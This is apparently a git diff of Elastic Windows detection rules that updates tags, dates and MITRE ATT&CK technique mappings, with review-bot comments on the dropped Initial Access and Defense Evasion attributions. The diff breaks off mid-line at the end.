@@ -104,20 +104,27 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - diff --git a/rules/windows/execution_shared_modules_local_sxs_dll.toml b/rules/windows/execution_shared_modules_local_sxs_dll.toml index 26b1f2df891..dfd8907197a 100644 --- a/rules/windows/execution_shared_modules_local_sxs_dll.toml +++ b/rules/windows/execution_shared_modules_local_sxs_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -32,19 +32,7 @@ references = ["https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link- risk_score = 47 rule_id = "a3ea12f3-0d4e-4667-8b44-4230c63f3c75" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -60,14 +48,18 @@ file where host.os.type == "windows" and file.extension : "dll" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1129" -name = "Shared Modules" -reference = "https://attack.mitre.org/techniques/T1129/" +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/execution_suspicious_cmd_wmi.toml b/rules/windows/execution_suspicious_cmd_wmi.toml index 9f27f9612ae..6d9476b2655 100644 --- a/rules/windows/execution_suspicious_cmd_wmi.toml +++ b/rules/windows/execution_suspicious_cmd_wmi.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/05/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,20 +67,7 @@ references = [ risk_score = 73 rule_id = "12f07955-1674-44f7-86b5-c35da0a6f41a" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -94,6 +81,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" 
@@ -103,15 +91,31 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/execution_suspicious_pdf_reader.toml b/rules/windows/execution_suspicious_pdf_reader.toml index c816d82ecd2..8a753362bf8 100644 --- a/rules/windows/execution_suspicious_pdf_reader.toml +++ b/rules/windows/execution_suspicious_pdf_reader.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -76,21 +76,7 @@ This rule looks for commonly abused built-in utilities spawned by a PDF reader p risk_score = 21 rule_id = "53a26770-9cbd-40c5-8b57-61d01a325e14" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Initial Access", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" 
@@ -113,31 +99,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_suspicious_psexesvc.toml b/rules/windows/execution_suspicious_psexesvc.toml index 6fcd26f682b..63a8aefc8fc 100644 --- a/rules/windows/execution_suspicious_psexesvc.toml +++ b/rules/windows/execution_suspicious_psexesvc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -80,36 +80,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_via_compiled_html_file.toml b/rules/windows/execution_via_compiled_html_file.toml index 15d381da770..ecb2bdda992 100644 --- a/rules/windows/execution_via_compiled_html_file.toml +++ b/rules/windows/execution_via_compiled_html_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -119,20 +119,7 @@ When users double-click CHM files, the HTML Help executable program (`hh.exe`) w risk_score = 47 rule_id = "e3343ab9-4245-4715-b344-e11c56b0a47f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -145,36 +132,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.001" name = "Compiled HTML File" reference = "https://attack.mitre.org/techniques/T1218/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/windows/execution_via_hidden_shell_conhost.toml b/rules/windows/execution_via_hidden_shell_conhost.toml index df930dae4f7..c4713761847 100644 --- a/rules/windows/execution_via_hidden_shell_conhost.toml +++ b/rules/windows/execution_via_hidden_shell_conhost.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,20 +76,7 @@ references = [ risk_score = 73 rule_id = "05b358de-aa6d-4f6c-89e6-78f74018b43b" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" 
@@ -107,38 +94,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_via_mmc_console_file_unusual_path.toml b/rules/windows/execution_via_mmc_console_file_unusual_path.toml index 52678af5806..2b997f4d88f 100644 --- a/rules/windows/execution_via_mmc_console_file_unusual_path.toml +++ b/rules/windows/execution_via_mmc_console_file_unusual_path.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/19" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -63,20 +63,7 @@ references = ["https://www.elastic.co/security-labs/grimresource"] risk_score = 47 rule_id = "7e23dfef-da2c-4d64-b11d-5f285b638853" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Resources: Investigation Guide", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" 
@@ -106,41 +93,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/execution_windows_cmd_shell_susp_args.toml b/rules/windows/execution_windows_cmd_shell_susp_args.toml index 9d8c461049c..7297fbfd210 100644 --- a/rules/windows/execution_windows_cmd_shell_susp_args.toml +++ b/rules/windows/execution_windows_cmd_shell_susp_args.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/06" integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -62,19 +62,7 @@ The Windows Command Shell (cmd.exe) is a critical component for executing comman risk_score = 73 rule_id = "d9ffc3d6-9de9-4b29-9395-5757d0695ecf" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Windows Security Event Logs", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Windows Security Event Logs", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Elastic Endgame", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -161,19 +149,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - 
diff --git a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml index f2fdff5ae2b..da0f6bf4dc8 100644 --- a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml +++ b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,19 +57,7 @@ note = """## Triage and analysis risk_score = 73 rule_id = "fbad57ec-4442-48db-a34f-5ee907b44a22" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Windows Security Event Logs", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -84,61 +72,51 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.004" 
+name = "Malicious Copy and Paste" +reference = "https://attack.mitre.org/techniques/T1204/004/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" \ No newline at end of file +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_windows_phish_clickfix.toml b/rules/windows/execution_windows_phish_clickfix.toml index 499cedf6295..ea6bea70489 100644 --- a/rules/windows/execution_windows_phish_clickfix.toml +++ b/rules/windows/execution_windows_phish_clickfix.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/08/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,20 +53,7 @@ references = ["https://mrd0x.com/filefix-clickfix-alternative/"] risk_score = 73 rule_id = "7dc45430-7407-4790-b89e-c857c3f6bf23" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Data Source: Windows Security Event Logs", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
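Review bot: The `TA0001 Initial Access` block (T1566.001 Spearphishing Attachment) is deleted outright instead of being kept next to the new T1204.004 Malicious Copy and Paste mapping, so the fake-CAPTCHA rule no longer records the delivery phase it detects. Dropping the mapping rather than adding the missing `"Tactic: Initial Access"` tag is the narrower of the two ways to make tags and threat agree, and it removes this rule from any Initial Access coverage view. If the narrowing is intentional, a short note in the commit message would help; otherwise a second `[[rule.threat]]` block for T1566 (Phishing) with the matching tag restores the attribution. The hunk starts on the previous line and the `query` it annotates is outside it.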
@@ -83,61 +70,23 @@ not (process.name : "rundll32.exe" and process.args : ("ndfapi.dll,NdfRunDllDiag [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" [[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" +[[rule.threat.technique.subtechnique]] +id = "T1204.004" +name = "Malicious Copy and Paste" +reference = "https://attack.mitre.org/techniques/T1204/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.005" -name = "Mshta" -reference = "https://attack.mitre.org/techniques/T1218/005/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" 
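Review bot: The removed `TA0005 Defense Evasion` entry (T1218.005 Mshta) and the T1059.001/.003 interpreter mappings are dropped while the hunk's own context line still shows the query reasoning about `rundll32.exe` process arguments, which suggests the detection continues to key on system-binary proxy execution; if so, keeping T1218 under Defense Evasion alongside the new T1204 mapping preserves that attribution. The `query` body is outside the hunk, so confirm against the full expression before merging. The tags hunk in the same file already removes `"Tactic: Defense Evasion"` and `"Tactic: Initial Access"` to match this narrowing, so reinstating either mapping means restoring its tag as well.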
diff --git a/rules/windows/execution_windows_powershell_susp_args.toml b/rules/windows/execution_windows_powershell_susp_args.toml index ff0cfea3021..1678f421920 100644 --- a/rules/windows/execution_windows_powershell_susp_args.toml +++ b/rules/windows/execution_windows_powershell_susp_args.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/06" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,20 +63,7 @@ PowerShell is a powerful scripting language and command-line shell used for task risk_score = 47 rule_id = "83bf249e-4348-47ba-9741-1202a09556ad" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Windows Security Event Logs", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -186,19 +173,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/execution_windows_script_from_internet.toml b/rules/windows/execution_windows_script_from_internet.toml index b0f8b6c40d2..2f9e2dc686d 100644 --- a/rules/windows/execution_windows_script_from_internet.toml +++ b/rules/windows/execution_windows_script_from_internet.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/31" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" min_stack_version = "9.1.0" min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases." @@ -20,14 +20,7 @@ name = "Execution of a Downloaded Windows Script" risk_score = 47 rule_id = "79543b00-28a5-4461-81ac-644c4dc4012f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation 